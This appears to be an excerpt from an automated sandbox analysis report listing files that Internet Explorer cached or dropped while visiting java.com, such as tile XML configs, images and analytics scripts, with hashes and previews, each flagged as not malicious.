SHA-512:	3FC8B7818668A409854F453881EAEF4586A7208997E324359A58B0F4224076D48C10DF7695A5AF7AD4885953A459B1A979C61F18155F05BF1E1FB8F96C0A5F74
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.wikipedia.com/"/><date>0xa9f63655,0x01d7411c</date><accdate>0xa9f63655,0x01d7411c</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.wikipedia.com/"/><date>0xa9f63655,0x01d7411c</date><accdate>0xa9f898ac,0x01d7411c</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Wikipedia.url"/></tile></msapplication></browserconfig>..

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-4759708130\msapplication.xml Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	650
Entropy (8bit):	5.060371302055065
Encrypted:	false
SSDEEP:	12:TMHdNMNxisWQ8nWimI002EtM3MHdNMNxisWQ8nWimI00OVbd5EtMb:2d6NxJh8SZHKd6NxJh8SZ7VJjb
MD5:	580A9A93B803E2E9F9889D3A85484C73
SHA1:	594C7D8682EA67CC3EFE3CCE2E7BD4C208235E41
SHA-256:	F7F738A39D02DE0C298EF937BCE2CFDCEEAE3DB905E417A724A3255E5ADA1DE9
SHA-512:	74D8468C871926F50D842F1D6F873A5199EBF8F2913BB127A309944B457FB29263C99F9583B35F6223369B08C4B659B5E962397ADCD0E912D64415DDDDC949F5
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.live.com/"/><date>0xa9f3d3f1,0x01d7411c</date><accdate>0xa9f3d3f1,0x01d7411c</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.live.com/"/><date>0xa9f3d3f1,0x01d7411c</date><accdate>0xa9f3d3f1,0x01d7411c</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Live.url"/></tile></msapplication></browserconfig>..

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-6757900\msapplication.xml Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	659
Entropy (8bit):	5.091662142267538
Encrypted:	false
SSDEEP:	12:TMHdNMNxhGwsiDQijnWimI002EtM3MHdNMNxhGwsiDQijnWimI00OVb8K075EtMb:2d6NxQP5USZHKd6NxQP5USZ7VYKajb
MD5:	45821341258C5B1D9B0E4B45353D2196
SHA1:	4883D1EB1254F899328E1A8289928EF695F33A72
SHA-256:	699529C08D6F6FC4A5857BDC7EEAB0446AB625AD4823F670ED177579EFB7FBA8
SHA-512:	0C3F1FAA6768EA0F5D5E1A9009FD158F546308BD5CB3A007BF9340EB942760CC901BD2D3C7EADF7E86FDFCBEDE22E7B19EEDE8D89D960F944EB0879479EDB86A
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0xa9f898ac,0x01d7411c</date><accdate>0xa9f898ac,0x01d7411c</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0xa9f898ac,0x01d7411c</date><accdate>0xa9f898ac,0x01d7411c</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Youtube.url"/></tile></msapplication></browserconfig>..

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-8760897390\msapplication.xml Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	656
Entropy (8bit):	5.1001271550548255
Encrypted:	false
SSDEEP:	12:TMHdNMNx0nsiQ4nWimI002EtM3MHdNMNx0nsiQ4nWimI00OVbxEtMb:2d6Nx0s14SZHKd6Nx0s14SZ7Vnb
MD5:	6A0F39CA76051E4D7F4D60C38A51FCDD
SHA1:	B6B6C2D68A5CAF343C0FE3B11AD6A01EB78C4453
SHA-256:	6ED4EFB84F5B3A3DD23CD62EE554C5E2E02582F3169F0522B0E9F2AA87BCB419
SHA-512:	86399DCE9E902F8DDF8862A8597635023A968E25FFBC26C1E393B6498D9614DCABE3243008F87642ABF3E3FC3810E5BBA5A03570461BD0A2C20387D773EF8CAC
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.reddit.com/"/><date>0xa9f63655,0x01d7411c</date><accdate>0xa9f63655,0x01d7411c</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.reddit.com/"/><date>0xa9f63655,0x01d7411c</date><accdate>0xa9f63655,0x01d7411c</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Reddit.url"/></tile></msapplication></browserconfig>..

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin20259167780\msapplication.xml Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	659
Entropy (8bit):	5.085254760169677
Encrypted:	false
SSDEEP:	12:TMHdNMNxxsWQ8nWimI002EtM3MHdNMNxxsWQ8nWimI00OVb6Kq5EtMb:2d6NxGh8SZHKd6NxGh8SZ7Vob
MD5:	ED4EF2393F5379CF90DA9488EA9A28DA
SHA1:	289C20C6C39B90EA097BE0E51F4A4024FEDC7B1C
SHA-256:	5E5FD96047C7154DDF58294238A5DC0AE3E2331DAB43761EC1D21A5B8C72937B
SHA-512:	CB6C7D23ECF85E7CF52A5D74BE46111DBDE9AA0CF39AF13D301652711FB896967A465E3DF123203A3D8CEFC2B8A7508D5F66C49AE4240484656DFD476DA05D71
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.nytimes.com/"/><date>0xa9f3d3f1,0x01d7411c</date><accdate>0xa9f3d3f1,0x01d7411c</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.nytimes.com/"/><date>0xa9f3d3f1,0x01d7411c</date><accdate>0xa9f3d3f1,0x01d7411c</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\NYTimes.url"/></tile></msapplication></browserconfig>..

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin20332743330\msapplication.xml Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	662
Entropy (8bit):	5.062448260016511
Encrypted:	false
SSDEEP:	12:TMHdNMNxcsjQDnWimI002EtM3MHdNMNxcsjQDnWimI00OVbVEtMb:2d6Nx70DSZHKd6Nx70DSZ7VDb
MD5:	7600AD893901E8AA09D1AD1E5BF7ED29
SHA1:	F17486D3B909332772A7E136F75FED5CF7D5D6BE
SHA-256:	75B496A97F7EF4AACC5AE97C7177A34C66BE27036AFDA473ECF2F03FF4B117D7
SHA-512:	C50C87BC56CA492B7D32CF40058321212DBE59F83FE35D805401627D29C3BDF10E061A030998BFFE83943A851E0B9D45263C3B017E2650B28CA55795644E0798
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0xa9f171a8,0x01d7411c</date><accdate>0xa9f171a8,0x01d7411c</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0xa9f171a8,0x01d7411c</date><accdate>0xa9f171a8,0x01d7411c</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Facebook.url"/></tile></msapplication></browserconfig>..

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin8215062560\msapplication.xml Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	656
Entropy (8bit):	5.046249479419248
Encrypted:	false
SSDEEP:	12:TMHdNMNxfnsWQ8nWimI002EtM3MHdNMNxfnsWQ8nWimI00OVbe5EtMb:2d6Nx0h8SZHKd6Nx0h8SZ7Vijb
MD5:	53EC91EFA94F09A881C0DF10CD0A792F
SHA1:	432565E9C8492475B508162F745DF9275670AD12
SHA-256:	02AB08F749B915E17B69ECD039EDA75ECCAA25C40A319FAB6A9FEC2C92DE04A6
SHA-512:	B31C04F312F79E6367B6C5D21CDAAFC18FDDA0711943A692FCF5EA7AC7511701215E523B5A424A06B8BD612B7EAB60AEF3DADBD89C808F761CB3034B7B4133C2
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.google.com/"/><date>0xa9f3d3f1,0x01d7411c</date><accdate>0xa9f3d3f1,0x01d7411c</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.google.com/"/><date>0xa9f3d3f1,0x01d7411c</date><accdate>0xa9f3d3f1,0x01d7411c</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Google.url"/></tile></msapplication></browserconfig>..

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\imagestore\wlm7n14\imagestore.dat Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	data
Category:	dropped
Size (bytes):	1252
Entropy (8bit):	5.517084007452127
Encrypted:	false
SSDEEP:	12:jXOplOqWlFMVaUsQsV444444wcAKyZmvebayz1Tqn2bz75rajZ0a7VN/GR6abfaf:jwOxMwUOVToYvU9Y2n75rajj7WDg/
MD5:	C7C46AD31E63ACC577149FCFA31EC3B3
SHA1:	7D034A0BB3DF87E891F96E6A0403DF227E4A850C
SHA-256:	14D702C80CBF62FFB3F959FE887B713DD5A05AD3441A542DE469DD6E0F3E6A41
SHA-512:	E58EE84615BC1C5683AB2608BACFBE4BAC102E9B304568BE76070333A4BD488A6ED6897A6B50CE7832B5CB596C35A30E840DCF817AFFD492FB892C228039BF2F
Malicious:	false
Preview:	.h.t.t.p.s.:././.w.w.w...j.a.v.a...c.o.m./.f.a.v.i.c.o.n...i.c.o.~............... .h.......(....... ..... .................................}h..}h..}h..}h..}h..}h..}h..}h..}h..}h..}h..}h..........\|.........................................................\|...p...............u..z\..z\..z\..z\..z\..z\..z\...............p...v...........................................................v...z..................qU..eG..eH..eG..qU......iL...u...........z..................................................jM...w..........................fH..iK..sV..gJ..fH..sV..........fH...v......................................n..m............}c...w.....................................'v.......`.......................................................e.......e...e.......................................................i......o....p.................................................v....q............................................................z...+z............................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3Y2ADQKS\JavaGreenfoot[1].jpg Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	JPEG image data, JFIF standard 1.01, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 125x132, frames 3
Category:	downloaded
Size (bytes):	3629
Entropy (8bit):	7.847576284308009
Encrypted:	false
SSDEEP:	96:jAyzHk1IBRBpKMGLWfUOOyDFvKk2j4qm6mV9PUks4tiDY:l7fjKdyfUoDgjqXr04tiE
MD5:	D28BC5EA9F5E4C6F983F012E071B2A21
SHA1:	E76684B1DDC5D7BA3AE0BDB53C09893E1D4DA12B
SHA-256:	73599CAFDE30FB5C1FC726A0D09595C7D5E681F670661990747B3294F8EF5746
SHA-512:	4B91C49BD298EF4103D1127DA1D17EC3B75661105164D93AB5A5041192B231654BD84D4483AE24CFC82A4EFE586582EB5013A19AE24E7AA607F5882361E553F6
Malicious:	false
IE Cache URL:	https://www.java.com/content/published/api/v1.1/assets/CONTE27F21C0DDA34CE985D9F7C9D23FC8B0/native?cb=_cache_97bc&channelToken=1f7d2611846d4457b213dfc9048724dc
Preview:	......JFIF.....d.d.....C..............................................!........."$".$.......C.........................................................................}..!........................................G..........................!.1.."QUq.346ARasu........#B..$r.2b.%S.............................................................1.!A..Qq......."2...............?...i=5R.e.....e..K.@..n..I...)....f&.r........-.`.Ot.W..0..6S.?U.%...)....f.7..{....e=.._b[.....Ot.W..0l..~..K}.X..)....f...O.}.o....e=.._b[........-.acp.Y..:....&....}Y.CB.B....$.Z..4.9..QK../N...>]...s.!...E(.N8...J..s...j.&.P...l.hR....Xis.t...#.N.t...{.ai)v_~..}...H.(%I..p..$OF#..\4F..p[....}D....u~....H..;..@...=X..Q....k..k..I.GH.f...Y....H.!.{k.....8..+..2.s.J.Z.HY.M..>Q.(......a4.L.%3.f.%.N8.7.l.`.H .e.$.4....Fys._......NSj\.s..>....;'/>.<./p.R.....}M.-#....Q,...74K<#d...H...KZ;.~..X......Ki..G.:.....OV...,.....t..j...H\|..:$.r.@..B...C.,>..d....qx.SV...N.mJ.je..i.eJ.S.5....2.....

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3Y2ADQKS\T79A9-GDDN2-93ZD5-M6HUR-X83QX[1].js Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	C source, ASCII text, with very long lines
Category:	downloaded
Size (bytes):	209939
Entropy (8bit):	5.366006952026174
Encrypted:	false
SSDEEP:	3072:1P6RsHIwj0PdUgdbs8kvdYkODdlm9AZoZXs+eSc:1msHIxHMvd8dtZoZDc
MD5:	FA4C76A7FDE62B18054CF7EB8E946012
SHA1:	B20150066A879D2B78DD3D4908F4ACD148EE66F8
SHA-256:	09EBD7F407439990AAC227E70DA23E1A819E8E30282928E324370805F480BEC4
SHA-512:	D72F5D078675C7ADBF6BFC1980712542A10668AEC9163137A2EC70A5E117F8FFDD0F06A6C4C6636E35C04F2754F33D40C65C59D452AFAA8EA4A382F24F200ABD
Malicious:	false
IE Cache URL:	https://s.go-mpulse.net/boomerang/T79A9-GDDN2-93ZD5-M6HUR-X83QX
Preview:	/. Copyright (c) 2011, Yahoo! Inc. All rights reserved.. * Copyright (c) 2011-2012, Log-Normal, Inc. All rights reserved.. * Copyright (c) 2012-2017, SOASTA, Inc. All rights reserved.. * Copyright (c) 2017, Akamai Technologies, Inc. All rights reserved.. * Copyrights licensed under the BSD License. See the accompanying LICENSE.txt file for terms.. /./ Boomerang Version: 1.720.0 b17966bb92f8ac2ddcda4ac1d9c0aaea6d2eda7b */..BOOMR_start=(new Date).getTime();function BOOMR_check_doc_domain(e){if(window){if(!e){if(window.parent===window\|\|!document.getElementById("boomr-if-as"))return;if(window.BOOMR&&BOOMR.boomerang_frame&&BOOMR.window)try{BOOMR.boomerang_frame.document.domain!==BOOMR.window.document.domain&&(BOOMR.boomerang_frame.document.domain=BOOMR.window.document.domain)}catch(t){BOOMR.isCrossOriginError(t)\|\|BOOMR.addError(t,"BOOMR_check_doc_domain.domainFix")}e=document.domain}if(e&&-1!==e.indexOf(".")&&window.parent){try{window.parent.document;return}catch(t){try{document.doma

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3Y2ADQKS\a[1].gif Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	GIF image data, version 89a, 1 x 1
Category:	downloaded
Size (bytes):	43
Entropy (8bit):	3.0314906788435274
Encrypted:	false
SSDEEP:	3:CUkwltxlHh/:P/
MD5:	325472601571F31E1BF00674C368D335
SHA1:	2DAEAA8B5F19F0BC209D976C02BD6ACB51B00B0A
SHA-256:	B1442E85B03BDCAF66DC58C7ABB98745DD2687D86350BE9A298A1D9382AC849B
SHA-512:	717EA0FF7F3F624C268ECCB244E24EC1305AB21557ABB3D6F1A7E183FF68A2D28F13D1D2AF926C9EF6D1FB16DD8CBE34CD98CACF79091DDDC7874DCEE21ECFDC
Malicious:	false
IE Cache URL:	https://www.java.com/_cache_4ba9/_themesdelivery/JCOM_Base_Theme/assets/img/header/a.gif
Preview:	GIF89a.............!.......,...........D..;

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3Y2ADQKS\caas_contenttypemap[1].json Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	ASCII text, with very long lines, with no line terminators
Category:	downloaded
Size (bytes):	3125
Entropy (8bit):	4.708672411255487
Encrypted:	false
SSDEEP:	24:DRW1pojcBXmQpFvjcUvpNzjcUvph1T1poApFv5pNz5phn+1poApFvNl0pNzNl0p5:DIfRbn+bFlUllbHbUb8D9p/beTbDbh
MD5:	7D8560AEF25A94AF3F959DB0AD8440EA
SHA1:	2871121A548A749D990996C6BFA30277464E82D9
SHA-256:	DA80CD5E7CA38A0D24D78256CF7D248BF8D5255140E1EF75C554EAC923E13CD5
SHA-512:	819E6640E8EB513764E929458EB8F8F39EAF96466905FBB4458FC9A7586C1A16E6E61274C0F4BCCD3FEEF1D0B226023219221D9DF2EFC5EF715D3529275BB314
Malicious:	false
IE Cache URL:	https://www.java.com/_cache_97bc/caas_contenttypemap.json
Preview:	[{"type":"JCOM_HelpArticle","categoryList":[{"categoryName":"Content List Default","layoutName":"JCOM-HelpArticle_Link"},{"categoryName":"Content Placeholder Default","layoutName":"JCOM-HelpArticle_Detail"},{"categoryName":"Default","layoutName":"JCOM-HelpArticle_Detail"},{"categoryName":"Empty Content List Default","layoutName":""}]},{"type":"JCOM_Footer","categoryList":[{"categoryName":"Content List Default","layoutName":""},{"categoryName":"Content Placeholder Default","layoutName":"JCOM-Footer_Detail"},{"categoryName":"Default","layoutName":"JCOM-Footer_Detail"},{"categoryName":"Empty Content List Default","layoutName":""}]},{"type":"JCOM_UninstallApplet","categoryList":[{"categoryName":"Content List Default","layoutName":""},{"categoryName":"Content Placeholder Default","layoutName":"JCOM-UninstallApplet_Detail"},{"categoryName":"Default","layoutName":"JCOM-UninstallApplet_Detail"},{"categoryName":"Empty Content List Default","layoutName":""}]},{"type":"JCOM_PropertyHTML","categor

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3Y2ADQKS\footer.min[1].js Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	ASCII text, with very long lines
Category:	downloaded
Size (bytes):	852
Entropy (8bit):	5.239961892663503
Encrypted:	false
SSDEEP:	24:xzptfQ2g9jDQkPBNIjA6hi2A6VOP8ce4+JlN8hDc+:xfQZZvIXU2Lseoc+
MD5:	B75CF6F8E60B4B337B0E80BD2F7B532F
SHA1:	02E01563455F45A096D55DEEA946073CA0475D50
SHA-256:	ACA721CB0D61F54B47CEDA57C90777FA82ADBF68F494B5AA9F3F3D92D6AAC102
SHA-512:	82299CF911C787BF3DF36E3C9ECC94E47A4D78183B5B3DDEFFED00673D356875F0736D7EECEA6F5626ADFC0B6B31E687D6354B044ECDDB6E27E67371BFAD34BF
Malicious:	false
IE Cache URL:	https://www.java.com/content/published/api/v1.1/assets/CONT32E28F7C5A8446DDA7E9CFA66A3A6DB7/native?cb=_cache_97bc&channelToken=1f7d2611846d4457b213dfc9048724dc
Preview:	var popupReference=null;function popFeedback(c){null==popupReference\|\|popupReference.closed?(navigator.userAgent.match(/(IE\|Internet Explorer\|Trident)/)&&(c=updateQueryParam("p",location.pathname,c)),params="width=620,height=635,directories=0,location=0,menubar=0,resizable=0,scrollbars=1,status=0,toolbar=0",popupReference=window.open(c,"popup",params)):popupReference.focus();return!1}.function updateQueryParam(c,d,a){var e=RegExp("([?&])"+c+"=.?(&\|$\|#)(.)","gi"),b;if(e.test(a)){if("undefined"!==typeof d&&null!==d)return a.replace(e,"$1"+c+"="+d+"$2$3");b=a.split("#");a=b[0].replace(e,"$1$3").replace(/(&\|\?)$/,"");if("undefined"!==typeof b[1]&&null!==b[1])return a+="#"+b[1]}else if("undefined"!==typeof d&&null!==d)return e=-1!==a.indexOf("?")?"&":"?",b=a.split("#"),a=b[0]+e+c+"="+d,"undefined"!==typeof b[1]&&null!==b[1]&&(a+="#"+b[1]),a};.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3Y2ADQKS\get[1].gif Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	GIF image data, version 89a, 133 x 18
Category:	downloaded
Size (bytes):	812
Entropy (8bit):	7.606653542056993
Encrypted:	false
SSDEEP:	12:AxVdAl1OT6u00C6H/NkWUk3sVB3sh+3f77tfusUaGzC7lNe8yhr1blpDXO0quAJ3:6du1pud/NR13kY+3T5ikY7JO0yJZIdE
MD5:	67BDF1C74574F113BE0B2B2838723A6B
SHA1:	BBC3932F39925D38FB53DC089FB3799547AB2FD7
SHA-256:	354FD37BD8E6B64BE30B23DB285EBCF3FEEC8DBE44CE038D583259E7BE40272D
SHA-512:	05B86E79E36851EF5B8AF1823D65F9F6FCE85C170C74195E5DAF9EE9731E3705DB4C79C785D6EDF2B106E0B3A87194FEF1BD352F339C098CC5A849EA566B4506
Malicious:	false
IE Cache URL:	https://consent.trustarc.com/get?name=oralogo-black.gif
Preview:	GIF89a.......}\|z...................igf...,(XWUIGF...875......$" 21/B@>POM/-+" .......b`_...rqp;98... .....!.......,............'~D.P...,...(>l]O....Q.I.G...).+.9....AY....z...$ ....CJ.v..v...3b..Ml.._.q......#f.a.R.`.R...]..".{\|S..]."._...........]L...........Q..]....=..].....k.z.#..b..."...d...]...^C\|t..D.@...A;2.......^..l.x....D..!.....].$....I.>..@....e..A.....0.....d;2..4..A.6v..!..}....u.@B>..P.A dO..^.....H.\|..S.........AB...U....<y...%....3beS....R.fd..........A.18......R...%..Z...U-L......a......Hp..s..=....7.h.. L.......p....._\|...P.^.......}..:x&...`.NzHi@...=. ...}...F (.v.t....D....m.P.X..v...f..6...t..F.....D&..DD....f.Y..........PZx.....h.......@..(w...%....f..0.#$vQ..p.^'...Nz.X..8....9.(w....`........h.".E.Ai.4.....0.6.HP.....]\|"...ah7..6..#...;

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3Y2ADQKS\infinity_common[1].js Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	ASCII text, with very long lines
Category:	downloaded
Size (bytes):	13562
Entropy (8bit):	5.416978515318094
Encrypted:	false
SSDEEP:	384:T2y6zJxt9uvRndnHEbsW0x+B8ccB+3qw2ERhfZR:TbJVK16w2UxZR
MD5:	A9032E68F2D9591E126404046A2BC7AB
SHA1:	B504627E622CCB9DFA1B6A828EA2BC2B37E80825
SHA-256:	B93E3D28B7AA290C8DB2BB4E1CA75D9BD1D84E85AA867BCFA598A6B2A3D27562
SHA-512:	08407843545CB9709CCA1DEEA3D95A68CAF73BC281A5F006F4499C86C7BD742EFD475533F1B9652A2F53B17F07352D5AF437FA2D085E8619CF33C2632E5D4220
Malicious:	false
IE Cache URL:	https://www.oracle.com/asset/web/analytics/infinity_common.js
Preview:	/!.######################################################..# INFINITY_COMMON.JS..# Version: 1.16.# BUILD DATE: Friday, Feb 19, 2021..# COPYRIGHT ORACLE CORP 2021 [UNLESS STATED OTHERWISE]..######################################################./.var OraInfCustPluginGlobals=(function(){var publicScope={};publicScope.getUrlQueryParameter=function(name){name=name.replace(/[\[]/,"\\[").replace(/[\]]/,"\\]");var regex=new RegExp("[\\?&]"+name+"=([^&#])");var results=regex.exec(location.search);return results===null?"":decodeURIComponent(results[1].replace(/\+/g," "));};publicScope.getHostName=function(r){if(r){var e=r.match(/\/\/(www[0-9]?\.)?(.[^/:]+)/i);return null!=e&&e.length>2&&"string"==typeof e[2]&&e[2].length>0?e[2]:null;}};publicScope.getHostObject=function(r){if(r){var e=r.match(/^(?:https?:\|ftps?:)?(?:\/\/)?([^\/\?]+[.]+[\w]+[:\w])/i);return null!=e&&e.length>1&&"string"==typeof e[1]&&e[1].length>0?{origin:e[0],host:e[1]}:null;}};publicScope.getMetaTagValue=function(name){var

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3Y2ADQKS\javamagazine(2)[1].jpg Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 125x132, frames 3
Category:	downloaded
Size (bytes):	4226
Entropy (8bit):	7.880591113615801
Encrypted:	false
SSDEEP:	96:VBzQCZdNH3huPYdVNsFNCfBuJcNYK9nnp0V2+TITq:NZdNhuPYthTNYKATIW
MD5:	2EFF9C6E995AD134C885B4BB0132891B
SHA1:	35C7E3F315107B38E1E2179B432F5D4EBCCC7EB0
SHA-256:	4C9A37DE6893B18623F4F0F5D8BD03767CD01CCCD23BD5A0F671B888520975D8
SHA-512:	6E5140429C7C964B2405572044B39BE1154AC5191EFECE2CE9A386B05EA2BB1076A4A2F41C5993BB58C6FFCB6A5025AE5483F9EB24ED1469E14FA2E4F39A6890
Malicious:	false
IE Cache URL:	https://www.java.com/content/published/api/v1.1/assets/CONT7D6EB42C70A34F858C8582494B5B021E/native?cb=_cache_97bc&channelToken=1f7d2611846d4457b213dfc9048724dc
Preview:	......JFIF.............C..............................................!........."$".$.......C.........................................................................}..!........................................J..........................!..1..AQa.."2RUq...#BS.......Tcr...$34bt.%Ds.................................1........................!.1Q...3Abq..."2a...4..............?..&;..J..K.0.[m.....YY$...It..+.....x..h..Q.L......te......=.U{..BxK....[....S..a..{...ov..;.U{..A.\|\..\|...\.U.2......:..e...A.r...s.....:..e....\..U.....A.r...s..T..U.2......>..e..........s.....:..e....S.}W..{.....:....[v.....-.....}....Se..P.8.M.......:M;76.*.y.v...K....w..A..50..01.....%..alu....mx.-..[^.,z...A...0...l.D........e.7!.....+..p.k..G.....okh.Sw.}..J.Y.i..J.QU..s.;....X...O..^KO..}.....i_hb...G...6..0rZ..+....-....\|.....Z......N,..I....3.......d....e..a.s.a.e..P0nOQ.!....9.<~.o..8FE......rM.7......?.+...#-Z.......r+).Sq.v.mY..fbiUba..C...<IP.I.../0..H.j z.1.`.K.&e.%.y

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3Y2ADQKS\layout[1].htm Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	ASCII text
Category:	downloaded
Size (bytes):	69
Entropy (8bit):	4.2053905817469905
Encrypted:	false
SSDEEP:	3:uGK4bqf6FGs/:vf
MD5:	31E65444B9EF22C90B0CB11A27F64863
SHA1:	D2AFF3063580CD697754584D923972FBDCFABE7A
SHA-256:	EE8A71FAFB65F44BF73C699B1C21F8C49B9FB176700FC2807D36413E5BF8A13B
SHA-512:	8FC0836155CD0B01BB7002C512DFD3661605676BC3F06C5837295715EC6343821CB30CF4955B0EAD8944BB140B461DC61623685229726BD2C42AA6B14308BDC3
Malicious:	false
IE Cache URL:	https://www.java.com/_compdelivery/_cache_0933/JCOM-Footer_Detail/assets/layout.html
Preview:	<div class="jvf0">. {{#fields}}. {{{body}}}. {{/fields}}.</div>.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3Y2ADQKS\metrics_group1[1].js Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	C source, ASCII text, with very long lines, with no line terminators
Category:	downloaded
Size (bytes):	33056
Entropy (8bit):	5.8215192547091705
Encrypted:	false
SSDEEP:	768:tJJCo9TM7eLE+UOS4bHv/fTzcG8+bau9zaxjPTTkDJa3I97:FCo9OeDS4bHv/fN8+PkwDJa497
MD5:	4F50071052FF768850C4E3E86ED7EDAC
SHA1:	B8A533324FA59E0D31934A548337AD09D011FBAD
SHA-256:	B0254F6D58ECC2EB396CC0722104E42AC097C5FDAF4827571035D2C29A774335
SHA-512:	DEB987E6BDCA55ADD4F55C3493658CE4C8F217B195C6524865243A6D8ACB441C0FD018E9EDDB04469C0CC95D0A03F9082DA9F3BF5162CE33D126DC53A1DA17AF
Malicious:	false
IE Cache URL:	https://www.java.com/_cache_4ba9/_themesdelivery/JCOM_Base_Theme/assets/js/metrics_group1.js
Preview:	var s=s_gi(s_account,1);s.dynamicAccountSelection=sun_dynamicAccountSelection,s.dynamicAccountList=sun_dynamicAccountList,s.trackDownloadLinks=!0,s.trackExternalLinks=!0,s.trackInlineStats=!0,s.linkDownloadFileTypes="exe,zip,wav,mp3,mov,mpg,avi,doc,pdf,xls,bin,tar,Z,gz,txt,bz2,mp4,jar,dmg,sh,msi,jnlp",s.linkInternalFilters="javascript:,sun.com,java.com,opensolaris.org,sun-catalogue.com,java.net,netbeans.org,openmediacommons.org,sunspotworld.com,openoffice.org,opensparc.net,sunsource.net,opensolaris.com,mysql.com,mysql.de,mysql.fr,projectdarkstar.com,sunstudentcourses.com,kenai.com,virtualbox.org,odftoolkit.org,javafx.com,openoffice.bouncer.osuosl.org,opends.org,suntrainingcatalogue.com,cloudoffice.com",s.linkLeaveQueryString=!1,"undefined"==typeof ltv\|\|""==ltv?s.linkTrackVars="None":s.linkTrackVars=ltv,"undefined"==typeof 